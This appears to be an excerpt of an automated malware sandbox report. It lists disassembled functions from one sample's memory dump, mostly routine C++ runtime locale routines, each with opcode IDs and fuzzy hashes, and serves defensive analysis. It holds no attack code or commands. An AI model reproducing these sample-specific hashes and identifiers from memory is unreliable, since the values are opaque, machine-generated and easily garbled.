                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEC07
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 46483c96ce90db6a4a5d7dab21ee94961dab64b0ccb373af0dcc8800637f8d89
                                                                        • Instruction ID: cab87381c40f54460373d469bd958b1eed9e8c4ba381adffd3505215aa3dde52
                                                                        • Opcode Fuzzy Hash: 46483c96ce90db6a4a5d7dab21ee94961dab64b0ccb373af0dcc8800637f8d89
                                                                        • Instruction Fuzzy Hash: 4941F371C00699DFCB11CFA8D940BAEBBB4FB05720F148299E915A7391DB30AE04CBD1
                                                                        Function 00AEEC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEC5D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEC80
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEECA8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEED1D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEED47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: b111e3dfa119a8bc6dbb74fba7d433a5c9a3af71e68369936ec5d18ce5ec69e7
                                                                        • Instruction ID: 6332e0a9fff6e8fb9ae0bda4aaf40f8e34f0f149164d277d737f4af3e5764b70
                                                                        • Opcode Fuzzy Hash: b111e3dfa119a8bc6dbb74fba7d433a5c9a3af71e68369936ec5d18ce5ec69e7
                                                                        • Instruction Fuzzy Hash: 4841FF71C00699DFCB21CFA8D980BAEBBB4FB41724F244259E915A7391DB30AE04CBD1
                                                                        Function 00AEED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEED9D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEDC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEDE8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEEE5D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEE87
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 38b6504841422cbd93260903668e0ff9964466e438fd78b193547ca68a8e4c2f
                                                                        • Instruction ID: bac5a1fcd466a734c7cf11c94f0c8b4e1bb365ea3890f2689357a40d26c18402
                                                                        • Opcode Fuzzy Hash: 38b6504841422cbd93260903668e0ff9964466e438fd78b193547ca68a8e4c2f
                                                                        • Instruction Fuzzy Hash: D741FF31D00699EFCB10CFA8D980BAEBBB4FB06724F144659E915A7391DB30AE44CBD1
                                                                        Function 00AE7C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000010,00000010,?,00AE7912,?,?), ref: 00AE7C37
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                        • API String ID: 1452528299-1782174991
                                                                        • Opcode ID: 8bee4e7c0a214ff6915812cdb5991020dee299ef6174fd828fca0aea395bda39
                                                                        • Instruction ID: 175109dcff24003dcc5a5e75af30fbef83a5da3df20b599005c56373e5dcfaed
                                                                        • Opcode Fuzzy Hash: 8bee4e7c0a214ff6915812cdb5991020dee299ef6174fd828fca0aea395bda39
                                                                        • Instruction Fuzzy Hash: B9215E49A102A286CB741F3E8400739B2F4EF94745F7518AFD9C9D7394E76A8CC28394
                                                                        Function 00AF6FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$Maklocchr
                                                                        • String ID:
                                                                        • API String ID: 2020259771-0
                                                                        • Opcode ID: f3101adc4fe773e585839ab5e53e1b0273af8bd546af4e0af7761eccca7dbcc4
                                                                        • Instruction ID: 67789a9d30bfc9998c97ff1727d4e9735396fb48fc781f0efe00277aa697ca4a
                                                                        • Opcode Fuzzy Hash: f3101adc4fe773e585839ab5e53e1b0273af8bd546af4e0af7761eccca7dbcc4
                                                                        • Instruction Fuzzy Hash: B1118CB1508748BBE720DBE59881F6AB7ECBF08310F04051AF2898BA41D6A5FD5087A4
                                                                        Function 00AF2823 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF282A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2834
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • numpunct.LIBCPMT ref: 00AF286E
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF2885
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF28A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: e948096cc8a9e2ed37502633f8dd52c4c59ee4cbcd3c8ddab07811ca1a8c4f17
                                                                        • Instruction ID: b2dcd6c3e1fc996fdb117e3b8f911558630948371bdd650f0ed66bec9996d75f
                                                                        • Opcode Fuzzy Hash: e948096cc8a9e2ed37502633f8dd52c4c59ee4cbcd3c8ddab07811ca1a8c4f17
                                                                        • Instruction Fuzzy Hash: FA11ED3690065D9BCF04EBA4C956BBE7BB1AF84710F280049F611AB391DF349E018BD1
                                                                        Function 00AF8030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF8037
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8041
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • numpunct.LIBCPMT ref: 00AF807B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8092
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF80B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: 994a1f3578822ce68ed35c7e17432352b2810f330e01af63dbc3c6a85d050cc3
                                                                        • Instruction ID: 8c2c6f5c9c4654e56786c6bc08de3bf8533afb52e292d85eaef028e49b91341f
                                                                        • Opcode Fuzzy Hash: 994a1f3578822ce68ed35c7e17432352b2810f330e01af63dbc3c6a85d050cc3
                                                                        • Instruction Fuzzy Hash: 3501803690061D9BCB15EBE4D9456BE7BA1AF84310F640549F610AB2D2DF349E068B91
                                                                        Function 00AF75B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF75BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF75C7
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF7601
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7618
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7638
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 820f8c6ed337387960b1d62bc71fa8ee524a887ce31715f817830a4fdb0e7f82
                                                                        • Instruction ID: b5ff94f2c96080846dd6b0739b5fa4763844863dbb1c08fa38610a8cc7c9854c
                                                                        • Opcode Fuzzy Hash: 820f8c6ed337387960b1d62bc71fa8ee524a887ce31715f817830a4fdb0e7f82
                                                                        • Instruction Fuzzy Hash: E801807590465D9BCB05EBB8D945ABE7BB1AF84310F240449F611AB392DF349F02CB91
                                                                        Function 00AF76E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF76E7
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF76F1
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00AF772B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7742
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7762
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 28431dbb9752fd5c7dbd73545db4734fb656cb293025055df8bba17a65bb8890
                                                                        • Instruction ID: c847296e3d475b2fb1f248fffa93fb67d614bad21cf9737faa2bbff220978656
                                                                        • Opcode Fuzzy Hash: 28431dbb9752fd5c7dbd73545db4734fb656cb293025055df8bba17a65bb8890
                                                                        • Instruction Fuzzy Hash: F601C03591465D9BCB01FBA4DA45ABE7BA1AF84310F240449F6116B2D2DF349E029B90
                                                                        Function 00AF2664 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF266B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2675
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF26AF
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF26C6
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF26E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: c826efad15bb3e14fb2b31caa2bcab0cb3d47dabfdfcbf0cac071b17c8159045
                                                                        • Instruction ID: 4209c6dfb6bf1325390ce5ce1d83b82df5610643e20cee340be184c5250f88c3
                                                                        • Opcode Fuzzy Hash: c826efad15bb3e14fb2b31caa2bcab0cb3d47dabfdfcbf0cac071b17c8159045
                                                                        • Instruction Fuzzy Hash: A001C035900A5D9BCF05EBA4C9457BEBBA1EF84310F240409F610AB291DF749E029B90
                                                                        Function 00AF764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7652
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF765C
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF7696
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF76AD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF76CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: d07e4f1f916c8d76c52a4010261e2623a606043d2f3669a567804d94e889d13e
                                                                        • Instruction ID: 3e1c7e5e7ac9dc80c3578919df4a69d3d59226121713a7949ca6247cd1f1cc00
                                                                        • Opcode Fuzzy Hash: d07e4f1f916c8d76c52a4010261e2623a606043d2f3669a567804d94e889d13e
                                                                        • Instruction Fuzzy Hash: 0301C036914A1D8BCB01EBA8D945ABE7BB1BF88311F240009F610AB391DF349E028B91
                                                                        Function 00AF7775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF777C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7786
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00AF77C0
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF77D7
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF77F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 3b62e954015c29b08beb732cd325cc529ce3527e42a8181ca82d220413b61a01
                                                                        • Instruction ID: d3be2987ba9227ee4408247d7af184141b0abec2f5bacc942f0b384c62792ec5
                                                                        • Opcode Fuzzy Hash: 3b62e954015c29b08beb732cd325cc529ce3527e42a8181ca82d220413b61a01
                                                                        • Instruction Fuzzy Hash: 9F01C07590461DDBCB01FBA4D9456BE7BB1AF84310F240449F6216B2D2CF349E028BD0
                                                                        Function 00AF789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF78A6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF78B0
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00AF78EA
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7901
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7921
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: eb2a51f5a472fb44e2accd6f4190b0245447bb77252cf262a663fb029481011b
                                                                        • Instruction ID: 17232abd3352811f877c31db66ee293e8512fad908f158a1b3c1b6353de19e10
                                                                        • Opcode Fuzzy Hash: eb2a51f5a472fb44e2accd6f4190b0245447bb77252cf262a663fb029481011b
                                                                        • Instruction Fuzzy Hash: FB01803590461D9BCB15EBE4DA466BE7BA1AF84310F240449F6106B292DF749F01DB90
                                                                        Function 00B038C1 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B038C8
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B038D2
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00B0390C
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03923
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03943
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 4aeaa0bc03c3e5e1a8d45f9d3c57bb8a055cf5e3a925f6d452a4d43180342fc1
                                                                        • Instruction ID: 8647cf0f7360ce22668ab6ae9f04e073d3432cafbd4946d0acb4a7f13290d2dd
                                                                        • Opcode Fuzzy Hash: 4aeaa0bc03c3e5e1a8d45f9d3c57bb8a055cf5e3a925f6d452a4d43180342fc1
                                                                        • Instruction Fuzzy Hash: 910192359006199BCF05EBA4C94AABEBBE9EF84720F240489F6116B3D1DF749F018B94
                                                                        Function 00AF780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7811
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • ctype.LIBCPMT ref: 00AF7855
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF786C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                        • String ID:
                                                                        • API String ID: 83828444-0
                                                                        • Opcode ID: 0e91b4baf3861f88b51ab936f2e68b341463b9a47760ded0246be7e286e5c139
                                                                        • Instruction ID: ade80334a10b11604f7452b1310a133fae6eb71282f802c1e0f0bd0caa236e8f
                                                                        • Opcode Fuzzy Hash: 0e91b4baf3861f88b51ab936f2e68b341463b9a47760ded0246be7e286e5c139
                                                                        • Instruction Fuzzy Hash: 7701CC7690465E8BCB05EBA4D94A6BE7BB1AF84310F240409F611AB2D2DF349E02CBD0
                                                                        Function 00AF7934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF793B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7945
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
